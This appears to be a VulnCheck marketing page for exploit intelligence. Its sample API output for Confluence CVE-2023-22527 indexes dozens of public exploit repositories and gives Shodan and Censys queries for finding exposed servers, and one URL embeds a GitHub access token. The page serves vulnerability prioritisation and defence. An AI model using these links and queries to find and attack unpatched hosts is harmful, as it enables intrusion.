Exploit Intelligence from VulnCheck
Better Data Faster Through AWS to Enrich Cyber Platforms and Response Team Workflows
Exploit Intelligence for Vulnerability Prioritization
VulnCheck has reimagined vulnerability prioritization, giving teams better data faster to defend against threats that actually matter. VulnCheck's 100% autonomous collection system pulls and curates intelligence from over 500+ sources in real-time across 450M+ records on ALL CVEs to power faster response time to the weaponized or exploited vulnerabilities.
VulnCheck Solutions
Exploit & Vulnerability Intelligence
Leverage Exploit & Vulnerability Intelligence to make better decisions on which vulnerabilities need immediate remediation.
- VulnCheck KEV indexes 4,205 exploited in-the-wild vulnerabilities vs. 1,436 in CISA KEV (192.83% more) and VulnCheck notifies users days, months and even years earlier than CISA
- Tracking of 5x more exploits than Exploit-DB's 43,590 & at least 1 exploit for 31.4% of CVEs (vs. 12.9% in Exploit-DB)
- Cached copies and git history of all archived exploit code
GET /v3/index/exploits?cve=CVE-2023-22527
[
{
"id": "CVE-2023-22527",
"public_exploit_found": true,
"commercial_exploit_found": true,
"weaponized_exploit_found": true,
"max_exploit_maturity": "weaponized",
"reported_exploited_by_honeypot_service": true,
"reported_exploited_by_vulncheck_canaries": false,
"reported_exploited": true,
"reported_exploited_by_threat_actors": true,
"reported_exploited_by_ransomware": true,
"reported_exploited_by_botnets": true,
"inKEV": true,
"inVCKEV": true,
"timeline": {
"nvd_published": "2024-01-16T05:15:08.29Z",
"nvd_last_modified": "2025-02-09T20:50:17.667Z",
"first_exploit_published": "2024-01-19T00:00:00Z",
"first_exploit_published_weaponized_or_higher": "2024-01-22T00:00:00Z",
"most_recent_exploit_published": "2025-05-19T00:00:00Z",
"first_reported_threat_actor": "2024-01-19T00:00:00Z",
"most_recent_reported_threat_actor": "2025-10-09T00:00:00Z",
"first_reported_ransomware": "2024-03-07T00:00:00Z",
"most_recent_reported_ransomware": "2025-05-05T00:00:00Z",
"first_reported_botnet": "2024-03-20T00:00:00Z",
"most_recent_reported_botnet": "2025-07-17T00:00:00Z",
"cisa_kev_date_added": "2024-01-24T00:00:00Z",
"cisa_kev_date_due": "2024-02-14T00:00:00Z",
"vulncheck_kev_date_added": "2024-01-19T00:00:00Z",
"vulncheck_kev_date_due": "2024-02-14T00:00:00Z"
},
"trending": {
"github": false
},
"epss": {
"epss_score": 0.94316,
"epss_percentile": 0.99944,
"last_modified": "2025-10-06T13:40:10.389902143Z"
},
"counts": {
"exploits": 40,
"threat_actors": 3,
"botnets": 3,
"ransomware_families": 2
},
"exploits": [
{
"url": "https://raw.githubusercontent.com/vulncheck-oss/0day.today.archive/main/remote-exploits/39278.txt",
"name": "Atlassian Confluence SSTI Injection Exploit",
"refsource": "0day.today",
"date_added": "2024-01-29T00:00:00Z",
"exploit_maturity": "poc",
"exploit_availability": "publicly-available"
},
{
"url": "https://raw.githubusercontent.com/vulncheck-oss/0day.today.archive/main/web-applications/39469.txt",
"name": "Atlassian Confluence < 8.5.3 - Remote Code Execution Exploit",
"refsource": "0day.today",
"date_added": "2024-03-18T00:00:00Z",
"exploit_maturity": "poc",
"exploit_availability": "publicly-available"
},
{
"url": "https://blog.projectdiscovery.io/atlassian-confluence-ssti-remote-code-execution/",
"name": "Atlassian Confluence - Remote Code Execution (CVE-2023-22527)",
"refsource": "blogs",
"date_added": "2024-01-22T00:00:00Z",
"exploit_maturity": "poc",
"exploit_availability": "publicly-available"
},
{
"url": "https://attackerkb.com/topics/wONJMCgCgl/cve-2023-22527",
"name": "CVE-2023-22527",
"refsource": "blogs",
"date_added": "2024-01-24T00:00:00Z",
"exploit_maturity": "poc",
"exploit_availability": "publicly-available"
},
{
"url": "https://boogipop.com/2024/02/13/Atlassian%20Confluence%20CVE-2023-22527%20%E5%88%86%E6%9E%90%E5%8F%8A%E6%AD%A6%E5%99%A8%E5%8C%96%E5%AE%9E%E7%8E%B0/",
"name": "Atlassian Confluence CVE-2023-22527 分析及武器化实现",
"refsource": "blogs",
"date_added": "2024-02-13T00:00:00Z",
"exploit_maturity": "poc",
"exploit_availability": "publicly-available"
},
{
"url": "https://vulncheck.com/blog/confluence-dreams-of-shells",
"name": "Does Confluence Dream of Shells?",
"refsource": "blogs",
"date_added": "2024-03-08T00:00:00Z",
"exploit_maturity": "poc",
"exploit_availability": "publicly-available"
},
{
"url": "https://www.labs.greynoise.io/grimoire/2024-03-confluence-where-are-they-now/",
"name": "Where are they now? Starring: Confluence CVE-2023-22527",
"refsource": "blogs",
"date_added": "2024-03-13T00:00:00Z",
"exploit_maturity": "poc",
"exploit_availability": "publicly-available"
},
{
"url": "https://www.vicarius.io/vsociety/posts/pwning-confluence-via-ognl-injection-for-fun-and-learning-cve-2023-22527",
"name": "Pwning Confluence via OGNL Injection for fun and learning - CVE-2023-22527",
"refsource": "blogs",
"date_added": "2024-04-18T00:00:00Z",
"exploit_maturity": "poc",
"exploit_availability": "publicly-available"
},
{
"url": "https://www.vicarius.io/vsociety/posts/automated-pwning-confluence-via-ognl-injection-cve-2023-22527",
"name": "Automated pwning Confluence via OGNL Injection (CVE-2023-22527)",
"refsource": "blogs",
"date_added": "2024-06-23T00:00:00Z",
"exploit_maturity": "poc",
"exploit_availability": "publicly-available"
},
{
"url": "https://www.trendmicro.com/en_us/research/24/h/godzilla-fileless-backdoors.html",
"name": "Silent Intrusions: Godzilla Fileless Backdoors Targeting Atlassian Confluence",
"refsource": "blogs",
"date_added": "2024-08-30T00:00:00Z",
"exploit_maturity": "poc",
"exploit_availability": "publicly-available"
},
{
"url": "https://thedfirreport.com/2025/05/19/another-confluence-bites-the-dust-falling-to-elpaco-team-ransomware/",
"name": "Another Confluence Bites the Dust: Falling to ELPACO-team Ransomware",
"refsource": "blogs",
"date_added": "2025-05-19T00:00:00Z",
"exploit_maturity": "poc",
"exploit_availability": "publicly-available"
},
{
"url": "https://www.coresecurity.com/core-labs/exploits",
"name": "Atlassian Confluence text-inline OGNL Injection Vulnerability Exploit",
"refsource": "coreimpact",
"date_added": "2024-01-26T00:00:00Z",
"exploit_maturity": "weaponized",
"exploit_availability": "commercially-available"
},
{
"url": "https://github.com/Drun1baby/CVE-2023-22527",
"name": "Drun1baby/CVE-2023-22527 exploit repository",
"refsource": "github-exploits",
"date_added": "2024-01-22T00:00:00Z",
"exploit_maturity": "poc",
"exploit_availability": "publicly-available",
"exploit_type": "initial-access",
"reference_url": "https://raw.githubusercontent.com/Drun1baby/CVE-2023-22527/main/PoC.txt",
"clone_ssh_url": "git@github.com:Drun1baby/CVE-2023-22527.git",
"clone_ssh_url_cached": "git@git.vulncheck.com:github.com/Drun1baby/CVE-2023-22527.git"
},
{
"url": "https://github.com/cleverg0d/CVE-2023-22527",
"name": "cleverg0d/CVE-2023-22527 exploit repository",
"refsource": "github-exploits",
"date_added": "2024-01-22T00:00:00Z",
"exploit_maturity": "poc",
"exploit_availability": "publicly-available",
"exploit_type": "initial-access",
"reference_url": "https://raw.githubusercontent.com/cleverg0d/CVE-2023-22527/main/README.md",
"clone_ssh_url": "git@github.com:cleverg0d/CVE-2023-22527.git",
"clone_ssh_url_cached": "git@git.vulncheck.com:github.com/cleverg0d/CVE-2023-22527.git"
},
{
"url": "https://github.com/thanhlam-attt/CVE-2023-22527",
"name": "thanhlam-attt/CVE-2023-22527 exploit repository",
"refsource": "github-exploits",
"date_added": "2024-01-22T00:00:00Z",
"exploit_maturity": "poc",
"exploit_availability": "publicly-available",
"exploit_type": "initial-access",
"reference_url": "https://raw.githubusercontent.com/thanhlam-attt/CVE-2023-22527/main/CVE-2023-22527.py",
"clone_ssh_url": "git@github.com:thanhlam-attt/CVE-2023-22527.git",
"clone_ssh_url_cached": "git@git.vulncheck.com:github.com/thanhlam-attt/CVE-2023-22527.git"
},
{
"url": "https://github.com/C1ph3rX13/CVE-2023-22527",
"name": "C1ph3rX13/CVE-2023-22527 exploit repository",
"refsource": "github-exploits",
"date_added": "2024-01-23T00:00:00Z",
"exploit_maturity": "poc",
"exploit_availability": "publicly-available",
"exploit_type": "initial-access",
"reference_url": "https://raw.githubusercontent.com/C1ph3rX13/CVE-2023-22527/main/CVE-2023-22527.go",
"clone_ssh_url": "git@github.com:C1ph3rX13/CVE-2023-22527.git",
"clone_ssh_url_cached": "git@git.vulncheck.com:github.com/C1ph3rX13/CVE-2023-22527.git"
},
{
"url": "https://github.com/Chocapikk/CVE-2023-22527",
"name": "Chocapikk/CVE-2023-22527 exploit repository",
"refsource": "github-exploits",
"date_added": "2024-01-23T00:00:00Z",
"exploit_maturity": "poc",
"exploit_availability": "publicly-available",
"exploit_type": "initial-access",
"reference_url": "https://raw.githubusercontent.com/Chocapikk/CVE-2023-22527/main/exploit.py",
"clone_ssh_url": "git@github.com:Chocapikk/CVE-2023-22527.git",
"clone_ssh_url_cached": "git@git.vulncheck.com:github.com/Chocapikk/CVE-2023-22527.git"
},
{
"url": "https://github.com/Manh130902/CVE-2023-22527-POC",
"name": "Manh130902/CVE-2023-22527-POC exploit repository",
"refsource": "github-exploits",
"date_added": "2024-01-23T00:00:00Z",
"exploit_maturity": "poc",
"exploit_availability": "publicly-available",
"exploit_type": "initial-access",
"reference_url": "https://raw.githubusercontent.com/Manh130902/CVE-2023-22527-POC/main/CVE-2023-22527.py",
"clone_ssh_url": "git@github.com:Manh130902/CVE-2023-22527-POC.git",
"clone_ssh_url_cached": "git@git.vulncheck.com:github.com/Manh130902/CVE-2023-22527-POC.git"
},
{
"url": "https://github.com/Niuwoo/CVE-2023-22527",
"name": "Niuwoo/CVE-2023-22527 exploit repository",
"refsource": "github-exploits",
"date_added": "2024-01-23T00:00:00Z",
"exploit_maturity": "poc",
"exploit_availability": "publicly-available",
"exploit_type": "initial-access",
"reference_url": "https://raw.githubusercontent.com/Niuwoo/CVE-2023-22527/main/CVE-2023-22527.py",
"clone_ssh_url": "git@github.com:Niuwoo/CVE-2023-22527.git",
"clone_ssh_url_cached": "git@git.vulncheck.com:github.com/Niuwoo/CVE-2023-22527.git"
},
{
"url": "https://github.com/RevoltSecurities/CVE-2023-22527",
"name": "RevoltSecurities/CVE-2023-22527 exploit repository",
"refsource": "github-exploits",
"date_added": "2024-01-23T00:00:00Z",
"exploit_maturity": "poc",
"exploit_availability": "publicly-available",
"exploit_type": "initial-access",
"reference_url": "https://raw.githubusercontent.com/RevoltSecurities/CVE-2023-22527/main/exploit.py",
"clone_ssh_url": "git@github.com:RevoltSecurities/CVE-2023-22527.git",
"clone_ssh_url_cached": "git@git.vulncheck.com:github.com/RevoltSecurities/CVE-2023-22527.git"
},
{
"url": "https://github.com/VNCERT-CC/CVE-2023-22527-confluence",
"name": "VNCERT-CC/CVE-2023-22527-confluence exploit repository",
"refsource": "github-exploits",
"date_added": "2024-01-23T00:00:00Z",
"exploit_maturity": "poc",
"exploit_availability": "publicly-available",
"exploit_type": "initial-access",
"reference_url": "https://raw.githubusercontent.com/VNCERT-CC/CVE-2023-22527-confluence/main/exploit-CVE-2023-22527.js",
"clone_ssh_url": "git@github.com:VNCERT-CC/CVE-2023-22527-confluence.git",
"clone_ssh_url_cached": "git@git.vulncheck.com:github.com/VNCERT-CC/CVE-2023-22527-confluence.git"
},
{
"url": "https://github.com/Vozec/CVE-2023-22527",
"name": "Vozec/CVE-2023-22527 exploit repository",
"refsource": "github-exploits",
"date_added": "2024-01-23T00:00:00Z",
"exploit_maturity": "poc",
"exploit_availability": "publicly-available",
"exploit_type": "initial-access",
"reference_url": "https://raw.githubusercontent.com/Vozec/CVE-2023-22527/main/CVE-2023-22527.py",
"clone_ssh_url": "git@github.com:Vozec/CVE-2023-22527.git",
"clone_ssh_url_cached": "git@git.vulncheck.com:github.com/Vozec/CVE-2023-22527.git"
},
{
"url": "https://github.com/Privia-Security/CVE-2023-22527",
"name": "Privia-Security/CVE-2023-22527 exploit repository",
"refsource": "github-exploits",
"date_added": "2024-01-24T00:00:00Z",
"exploit_maturity": "poc",
"exploit_availability": "publicly-available",
"exploit_type": "initial-access",
"reference_url": "https://raw.githubusercontent.com/Privia-Security/CVE-2023-22527/main/main.go",
"clone_ssh_url": "git@github.com:Privia-Security/CVE-2023-22527.git",
"clone_ssh_url_cached": "git@git.vulncheck.com:github.com/Privia-Security/CVE-2023-22527.git"
},
{
"url": "https://github.com/yoryio/CVE-2023-22527",
"name": "yoryio/CVE-2023-22527 exploit repository",
"refsource": "github-exploits",
"date_added": "2024-01-24T00:00:00Z",
"exploit_maturity": "poc",
"exploit_availability": "publicly-available",
"exploit_type": "initial-access",
"reference_url": "https://raw.githubusercontent.com/yoryio/CVE-2023-22527/main/CVE-2023-22527.py",
"clone_ssh_url": "git@github.com:yoryio/CVE-2023-22527.git",
"clone_ssh_url_cached": "git@git.vulncheck.com:github.com/yoryio/CVE-2023-22527.git"
},
{
"url": "https://github.com/MaanVader/CVE-2023-22527-POC",
"name": "MaanVader/CVE-2023-22527-POC exploit repository",
"refsource": "github-exploits",
"date_added": "2024-01-25T00:00:00Z",
"exploit_maturity": "poc",
"exploit_availability": "publicly-available",
"exploit_type": "initial-access",
"reference_url": "https://raw.githubusercontent.com/MaanVader/CVE-2023-22527-POC/master/exploit.py",
"clone_ssh_url": "git@github.com:MaanVader/CVE-2023-22527-POC.git",
"clone_ssh_url_cached": "git@git.vulncheck.com:github.com/MaanVader/CVE-2023-22527-POC.git"
},
{
"url": "https://github.com/adminlove520/CVE-2023-22527",
"name": "adminlove520/CVE-2023-22527 exploit repository",
"refsource": "github-exploits",
"date_added": "2024-01-25T00:00:00Z",
"exploit_maturity": "poc",
"exploit_availability": "publicly-available",
"exploit_type": "initial-access",
"reference_url": "https://raw.githubusercontent.com/adminlove520/CVE-2023-22527/main/CVE-2023-22527.py",
"clone_ssh_url": "git@github.com:adminlove520/CVE-2023-22527.git",
"clone_ssh_url_cached": "git@git.vulncheck.com:github.com/adminlove520/CVE-2023-22527.git"
},
{
"url": "https://github.com/YongYe-Security/CVE-2023-22527",
"name": "YongYe-Security/CVE-2023-22527 exploit repository",
"refsource": "github-exploits",
"date_added": "2024-02-02T00:00:00Z",
"exploit_maturity": "poc",
"exploit_availability": "publicly-available",
"exploit_type": "initial-access",
"reference_url": "https://raw.githubusercontent.com/YongYe-Security/CVE-2023-22527/main/CVE-2023-22527.py",
"clone_ssh_url": "git@github.com:YongYe-Security/CVE-2023-22527.git",
"clone_ssh_url_cached": "git@git.vulncheck.com:github.com/YongYe-Security/CVE-2023-22527.git"
},
{
"url": "https://github.com/Boogipop/CVE-2023-22527-Godzilla-MEMSHELL",
"name": "Boogipop/CVE-2023-22527-Godzilla-MEMSHELL exploit repository",
"refsource": "github-exploits",
"date_added": "2024-02-11T00:00:00Z",
"exploit_maturity": "poc",
"exploit_availability": "publicly-available",
"exploit_type": "initial-access",
"reference_url": "https://raw.githubusercontent.com/Boogipop/CVE-2023-22527-Godzilla-MEMSHELL/main/src/main/Main.java",
"clone_ssh_url": "git@github.com:Boogipop/CVE-2023-22527-Godzilla-MEMSHELL.git",
"clone_ssh_url_cached": "git@git.vulncheck.com:github.com/Boogipop/CVE-2023-22527-Godzilla-MEMSHELL.git"
},
{
"url": "https://github.com/M0untainShley/CVE-2023-22527-MEMSHELL",
"name": "M0untainShley/CVE-2023-22527-MEMSHELL exploit repository",
"refsource": "github-exploits",
"date_added": "2024-02-26T00:00:00Z",
"exploit_maturity": "poc",
"exploit_availability": "publicly-available",
"exploit_type": "initial-access",
"reference_url": "https://raw.githubusercontent.com/M0untainShley/CVE-2023-22527-MEMSHELL/master/src/main/Main.java",
"clone_ssh_url": "git@github.com:M0untainShley/CVE-2023-22527-MEMSHELL.git",
"clone_ssh_url_cached": "git@git.vulncheck.com:github.com/M0untainShley/CVE-2023-22527-MEMSHELL.git"
},
{
"url": "https://github.com/vulncheck-oss/cve-2023-22527",
"name": "vulncheck-oss/cve-2023-22527 exploit repository",
"refsource": "github-exploits",
"date_added": "2024-03-04T00:00:00Z",
"exploit_maturity": "poc",
"exploit_availability": "publicly-available",
"exploit_type": "initial-access",
"reference_url": "https://raw.githubusercontent.com/vulncheck-oss/cve-2023-22527/main/README.md?token=GHSAT0AAAAAACO2HCW4FJ4YNPSHC4TPP4AUZPHLNSQ",
"clone_ssh_url": "git@github.com:vulncheck-oss/cve-2023-22527.git",
"clone_ssh_url_cached": "git@git.vulncheck.com:github.com/vulncheck-oss/cve-2023-22527.git"
},
{
"url": "https://github.com/BBD-YZZ/Confluence-RCE",
"name": "BBD-YZZ/Confluence-RCE exploit repository",
"refsource": "github-exploits",
"date_added": "2024-05-29T00:00:00Z",
"exploit_maturity": "poc",
"exploit_availability": "publicly-available",
"exploit_type": "initial-access",
"reference_url": "https://raw.githubusercontent.com/BBD-YZZ/Confluence-RCE/master/pocs/CVE_2023_22527.py",
"clone_ssh_url": "git@github.com:BBD-YZZ/Confluence-RCE.git",
"clone_ssh_url_cached": "git@git.vulncheck.com:github.com/BBD-YZZ/Confluence-RCE.git"
},
{
"url": "https://github.com/kh4sh3i/CVE-2023-22527",
"name": "kh4sh3i/CVE-2023-22527 exploit repository",
"refsource": "github-exploits",
"date_added": "2024-10-06T00:00:00Z",
"exploit_maturity": "poc",
"exploit_availability": "publicly-available",
"exploit_type": "initial-access",
"reference_url": "https://raw.githubusercontent.com/kh4sh3i/CVE-2023-22527/refs/heads/main/CVE-2023-22527.py",
"clone_ssh_url": "git@github.com:kh4sh3i/CVE-2023-22527.git",
"clone_ssh_url_cached": "git@git.vulncheck.com:github.com/kh4sh3i/CVE-2023-22527.git"
},
{
"url": "https://github.com/AxthonyV/CVE-2023-22527",
"name": "AxthonyV/CVE-2023-22527 exploit repository",
"refsource": "github-exploits",
"date_added": "2024-10-07T00:00:00Z",
"exploit_maturity": "poc",
"exploit_availability": "publicly-available",
"exploit_type": "initial-access",
"reference_url": "https://raw.githubusercontent.com/AxthonyV/CVE-2023-22527/refs/heads/main/CVE-2023-22527.py",
"clone_ssh_url": "git@github.com:AxthonyV/CVE-2023-22527.git",
"clone_ssh_url_cached": "git@git.vulncheck.com:github.com/AxthonyV/CVE-2023-22527.git"
},
{
"url": "https://raw.githubusercontent.com/rapid7/metasploit-framework/master/modules/exploits/multi/http/atlassian_confluence_rce_cve_2023_22527.rb",
"name": "Atlassian Confluence SSTI Injection",
"refsource": "metasploit",
"date_added": "2024-01-22T00:00:00Z",
"exploit_maturity": "weaponized",
"exploit_availability": "publicly-available"
},
{
"url": "https://raw.githubusercontent.com/projectdiscovery/nuclei-templates/main/http/cves/2023/CVE-2023-22527.yaml",
"name": "Atlassian Confluence - Remote Code Execution",
"refsource": "nuclei-templates",
"date_added": "2024-01-25T00:00:00Z",
"exploit_maturity": "poc",
"exploit_availability": "publicly-available"
},
{
"url": "https://packetstormsecurity.com/files/176789/Atlassian-Confluence-SSTI-Injection.html",
"name": "Atlassian Confluence SSTI Injection",
"refsource": "packetstorm",
"date_added": "2024-01-26T00:00:00Z",
"exploit_maturity": "poc",
"exploit_availability": "publicly-available"
},
{
"url": "https://packetstormsecurity.com/files/177643/Atlassian-Confluence-8.5.3-Remote-Code-Execution.html",
"name": "Atlassian Confluence 8.5.3 Remote Code Execution",
"refsource": "packetstorm",
"date_added": "2024-03-19T00:00:00Z",
"exploit_maturity": "poc",
"exploit_availability": "publicly-available"
},
{
"url": "https://packetstormsecurity.com/files/179520/Confluence-Template-Injection-Remote-Code-Execution.html",
"name": "Confluence Template Injection Remote Code Execution",
"refsource": "packetstorm",
"date_added": "2024-07-15T00:00:00Z",
"exploit_maturity": "poc",
"exploit_availability": "publicly-available"
},
{
"url": "https://api.vulncheck.com/v3/index/initial-access?cve=CVE-2023-22527",
"name": "Confluence Template Injection (text-inline.vm)",
"refsource": "vulncheck-initial-access",
"date_added": "2024-01-22T00:00:00Z",
"exploit_maturity": "weaponized",
"exploit_availability": "commercially-available",
"exploit_type": "initial-access",
"clone_ssh_url": "git@git.vulncheck.com:vulncheck/initial-access.git"
},
{
"url": "https://x.com/ptswarm/status/1748331385968795882",
"name": "We have reproduced CVE-2023-22527 in Atlassian Confluence",
"refsource": "x",
"date_added": "2024-01-19T00:00:00Z",
"exploit_maturity": "poc",
"exploit_availability": "privately-available"
}
],
"reported_exploitation": [
{
"url": "https://www.ptsecurity.com/ru-ru/research/analytics/itogi-proektov-po-rassledovaniyu-inczidentov-i-retrospektivnomu-analizu-2023-2024/#id1",
"name": "Unattributed",
"refsource": "vulncheck-threat-actors",
"date_added": "2024-11-06T00:00:00Z"
},
{
"url": "https://www4.orangecyberdefense.com/security-navigator-2025-en",
"name": "Unattributed",
"refsource": "vulncheck-threat-actors",
"date_added": "2024-12-05T00:00:00Z"
},
{
"url": "https://thedfirreport.com/2025/02/24/confluence-exploit-leads-to-lockbit-ransomware/",
"name": "Unattributed",
"refsource": "vulncheck-threat-actors",
"date_added": "2025-02-24T00:00:00Z"
},
{
"url": "https://info.greynoise.io/hubfs/resources/GreyNoise-2025-Mass-Internet-Exploitation-Report.pdf",
"name": "Unattributed",
"refsource": "vulncheck-threat-actors",
"date_added": "2025-02-27T00:00:00Z"
},
{
"url": "https://thedfirreport.com/2025/05/19/another-confluence-bites-the-dust-falling-to-elpaco-team-ransomware/",
"name": "Unattributed",
"refsource": "vulncheck-threat-actors",
"date_added": "2025-05-19T00:00:00Z"
},
{
"url": "https://app.crowdsec.net/cti/cve-explorer/CVE-2023-22527",
"name": "Unattributed",
"refsource": "vulncheck-threat-actors",
"date_added": "2025-06-07T00:00:00Z"
},
{
"url": "https://www.enisa.europa.eu/sites/default/files/2025-10/ENISA%20Threat%20Landscape%202025.pdf",
"name": "Unattributed",
"refsource": "vulncheck-threat-actors",
"date_added": "2025-10-09T00:00:00Z"
}
],
"date_added": "2024-01-19T00:00:00Z",
"_timestamp": "2025-10-10T08:49:45.954951346Z"
}
]
Initial Access Intelligence
Initial Access Intelligence provides organizations the detection artifacts, such as Suricata signatures, YARA rules, PCAPs, and private exploit PoCs, to defend against initial access vulnerabilities, already exploited or likely to be soon.
- In-house developed proprietary exploit code (including bypass techniques) and detections (PCAPs, Suricata & Snort rules, YARA rules, Sigma rules, etc.)
- Custom Shodan, Censys, FOFA, ZoomEye, & GreyNoise queries to find potentially impacted devices
- VulnCheck for Government SLA commits to covering at least 200 new vulnerabilities per year with proprietary exploit code & detection artifacts
GET /v3/index/initial-access?cve=CVE-2023-22527
[
{
"cve": "CVE-2023-22527",
"inKEV": true,
"inVCKEV": true,
"vulnerable_cpes": [
"cpe:2.3:a:atlassian:confluence_data_center:8.0.0:*:*:*:*:*:*:*",
"cpe:2.3:a:atlassian:confluence_data_center:8.0.1:*:*:*:*:*:*:*",
"cpe:2.3:a:atlassian:confluence_data_center:8.0.2:*:*:*:*:*:*:*",
"cpe:2.3:a:atlassian:confluence_data_center:8.0.3:*:*:*:*:*:*:*",
"cpe:2.3:a:atlassian:confluence_data_center:8.0.4:*:*:*:*:*:*:*",
"cpe:2.3:a:atlassian:confluence_data_center:8.1.0:*:*:*:*:*:*:*",
"cpe:2.3:a:atlassian:confluence_data_center:8.1.3:*:*:*:*:*:*:*",
"cpe:2.3:a:atlassian:confluence_data_center:8.1.4:*:*:*:*:*:*:*",
"cpe:2.3:a:atlassian:confluence_data_center:8.2.0:*:*:*:*:*:*:*",
"cpe:2.3:a:atlassian:confluence_data_center:8.2.1:*:*:*:*:*:*:*",
"cpe:2.3:a:atlassian:confluence_data_center:8.2.2:*:*:*:*:*:*:*",
"cpe:2.3:a:atlassian:confluence_data_center:8.2.3:*:*:*:*:*:*:*",
"cpe:2.3:a:atlassian:confluence_data_center:8.3.0:*:*:*:*:*:*:*",
"cpe:2.3:a:atlassian:confluence_data_center:8.3.1:*:*:*:*:*:*:*",
"cpe:2.3:a:atlassian:confluence_data_center:8.3.2:*:*:*:*:*:*:*",
"cpe:2.3:a:atlassian:confluence_data_center:8.3.3:*:*:*:*:*:*:*",
"cpe:2.3:a:atlassian:confluence_data_center:8.3.4:*:*:*:*:*:*:*",
"cpe:2.3:a:atlassian:confluence_data_center:8.4.0:*:*:*:*:*:*:*",
"cpe:2.3:a:atlassian:confluence_data_center:8.4.1:*:*:*:*:*:*:*",
"cpe:2.3:a:atlassian:confluence_data_center:8.4.2:*:*:*:*:*:*:*",
"cpe:2.3:a:atlassian:confluence_data_center:8.4.3:*:*:*:*:*:*:*",
"cpe:2.3:a:atlassian:confluence_data_center:8.4.4:*:*:*:*:*:*:*",
"cpe:2.3:a:atlassian:confluence_data_center:8.4.5:*:*:*:*:*:*:*",
"cpe:2.3:a:atlassian:confluence_data_center:8.5.0:*:*:*:*:*:*:*",
"cpe:2.3:a:atlassian:confluence_data_center:8.5.1:*:*:*:*:*:*:*",
"cpe:2.3:a:atlassian:confluence_data_center:8.5.2:*:*:*:*:*:*:*",
"cpe:2.3:a:atlassian:confluence_data_center:8.5.3:*:*:*:*:*:*:*",
"cpe:2.3:a:atlassian:confluence_data_center:8.5:*:*:*:*:*:*:*",
"cpe:2.3:a:atlassian:confluence_data_center:8.7.0:*:*:*:*:*:*:*",
"cpe:2.3:a:atlassian:confluence_server:8.0.0:*:*:*:*:*:*:*",
"cpe:2.3:a:atlassian:confluence_server:8.0.1:*:*:*:*:*:*:*",
"cpe:2.3:a:atlassian:confluence_server:8.0.2:*:*:*:*:*:*:*",
"cpe:2.3:a:atlassian:confluence_server:8.0.3:*:*:*:*:*:*:*",
"cpe:2.3:a:atlassian:confluence_server:8.0.4:*:*:*:*:*:*:*",
"cpe:2.3:a:atlassian:confluence_server:8.1.0:*:*:*:*:*:*:*",
"cpe:2.3:a:atlassian:confluence_server:8.1.3:*:*:*:*:*:*:*",
"cpe:2.3:a:atlassian:confluence_server:8.1.4:*:*:*:*:*:*:*",
"cpe:2.3:a:atlassian:confluence_server:8.2.0:*:*:*:*:*:*:*",
"cpe:2.3:a:atlassian:confluence_server:8.2.1:*:*:*:*:*:*:*",
"cpe:2.3:a:atlassian:confluence_server:8.2.2:*:*:*:*:*:*:*",
"cpe:2.3:a:atlassian:confluence_server:8.2.3:*:*:*:*:*:*:*",
"cpe:2.3:a:atlassian:confluence_server:8.3.0:*:*:*:*:*:*:*",
"cpe:2.3:a:atlassian:confluence_server:8.3.1:*:*:*:*:*:*:*",
"cpe:2.3:a:atlassian:confluence_server:8.3.2:*:*:*:*:*:*:*",
"cpe:2.3:a:atlassian:confluence_server:8.3.3:*:*:*:*:*:*:*",
"cpe:2.3:a:atlassian:confluence_server:8.3.4:*:*:*:*:*:*:*",
"cpe:2.3:a:atlassian:confluence_server:8.4.0:*:*:*:*:*:*:*",
"cpe:2.3:a:atlassian:confluence_server:8.4.1:*:*:*:*:*:*:*",
"cpe:2.3:a:atlassian:confluence_server:8.4.2:*:*:*:*:*:*:*",
"cpe:2.3:a:atlassian:confluence_server:8.4.3:*:*:*:*:*:*:*",
"cpe:2.3:a:atlassian:confluence_server:8.4.4:*:*:*:*:*:*:*",
"cpe:2.3:a:atlassian:confluence_server:8.4.5:*:*:*:*:*:*:*",
"cpe:2.3:a:atlassian:confluence_server:8.5.0:*:*:*:*:*:*:*",
"cpe:2.3:a:atlassian:confluence_server:8.5.1:*:*:*:*:*:*:*",
"cpe:2.3:a:atlassian:confluence_server:8.5.2:*:*:*:*:*:*:*",
"cpe:2.3:a:atlassian:confluence_server:8.5.3:*:*:*:*:*:*:*"
],
"artifacts": [
{
"vendor": "Confluence",
"targetEncryptedComms": "either",
"mitreAttackTechniques": [
"T1190"
],
"product": [
"Confluence Server",
"Confluence Data Center"
],
"dateAdded": "2024-01-22T00:00:00Z",
"artifactName": "Confluence Template Injection (text-inline.vm)",
"exploit": true,
"versionScanner": true,
"pcap": true,
"sigmaRule": false,
"suricataRule": true,
"snortRule": true,
"yara": true,
"nmapScript": true,
"zeroday": false,
"targetService": "HTTP",
"targetDocker": true,
"googleQueries": [],
"googleRawQueries": [],
"baiduQueries": [
"https://www.baidu.com/s?wd=intitle%3A%22Log%20In%20-%20Confluence%22"
],
"baiduRawQueries": [
"intitle:\"Log In - Confluence\""
],
"shodanQueries": [
"https://www.shodan.io/search?query=%2Bhttp.favicon.hash%3A-305179312+%22X-Confluence-Request-Time%22+%2B%22Set-Cookie%3A+JSESSIONID%3D%22+%2Bhtml%3A%22confluence-context-path%22",
"https://www.shodan.io/search?query=X-Confluence-Request-Time+%2B%22JSESSIONID%22+%2Bhtml%3A%22atlassian-authentication-plugin%22+-%22145DF9C4CDE560B2699212692B867CDA%22",
"https://www.shodan.io/search?query=X-Confluence-Request-Time+%2B%22Set-Cookie%3A+JSESSIONID%22+%2Bhtml%3A%22SAML+POST+Binding%22"
],
"censysQueries": [
"https://platform.censys.io/search?q=host.services%3A%28endpoints.http.favicons.hash_md5%3D%22966e60f8eb85b7ea43a7b0095f3e2336%22%20and%20banner%3A%22Set-Cookie%3A%20JSESSIONID%22%20and%20banner%3A%22X-Confluence-Request-Time%22%20and%20endpoints.http.body%3A%22confluence-context-path%22%29"
],
"censysLegacyQueries": [
"https://search.censys.io/search?resource=hosts&sort=RELEVANCE&per_page=25&virtual_hosts=INCLUDE&q=same_service%28services.http.response.favicons.md5_hash%3D%22966e60f8eb85b7ea43a7b0095f3e2336%22+and+services.banner%3A%22Set-Cookie%3A+JSESSIONID%22+and+services.banner%3A%22X-Confluence-Request-Time%22+and+services.http.response.body%3A%22confluence-context-path%22%29"
],
"driftnetQueries": [],
"driftnetRawQueries": [],
"greynoiseQueries": [
"https://viz.greynoise.io/query?gnql=raw_data.web.paths%3A%22%2Ftemplate%2Faui%2Ftext-inline.vm%22",
"https://viz.greynoise.io/tag/atlassian-confluence-template-injection-rce-attempt-cve-2023-22527"
],
"fofaQueries": [
